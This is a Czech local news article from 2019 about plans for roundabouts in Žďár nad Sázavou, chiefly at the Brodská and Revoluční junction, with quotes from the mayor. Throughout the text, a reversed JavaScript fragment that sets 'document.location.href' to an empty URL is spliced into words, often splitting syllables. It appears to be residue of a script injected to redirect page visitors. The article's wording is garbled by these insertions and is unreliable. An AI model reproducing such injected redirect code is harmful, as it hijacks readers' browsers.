Rainbow page separator

Zlepšení dopravy na Stalingradě je během na dlouhou trať

Neděle, 1. září 2019

Projekt křižovatky v Brodské ulici se má řešit komplexně

Žďár nad Sázavou / Zlepšení průjezdnosti Žďáru prostřednictvím kruhových křižovatek podporuje žďárská radnice. Loni byla provizorně vyznačena okružní křižovatka ulic Wonkova, Vysocká a Studentská, která dostane konečnou podobu při plánované rekonstrukci krajské komunikace vedoucí ulicí Vysocká. O kruhovém objezdu se řadu let hovoří také v sídlišti Stalingrad, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na křížení ulic Brodská a Revoluční. Záměr ale dosud vždy ztroskotal na nedostatku místa a možné ztrátě už tak nedostatkových parkovacích stání. „Křižovatka tam smysl dává, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože v exponovaných časech je složité Brodskou vůbec přejet. Ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to možnost už se v minulosti prověřovala, ale situace je tam poměrně složitá z hlediska pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru,“ konsta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval starosta Žďáru Martin Mrkos. Podle jeho slov se bude nutné zabývat i dalšími úpravami v dotčené lokalitě, například parkováním či chodníky. „Je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to otázka dlouhodobějšího plánování, tu oblast musíme vyřešit jako celek,“ dodal starosta.
S další okružní křižovatkou se počítá na křížení ulic Jihlavská a Chelčického. K [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu dojde až s výstavbou další části obchvatu města, který propojí výpadovky vedoucí na Jihlavu a Brno. To by výhledově mohlo být v roce 2021.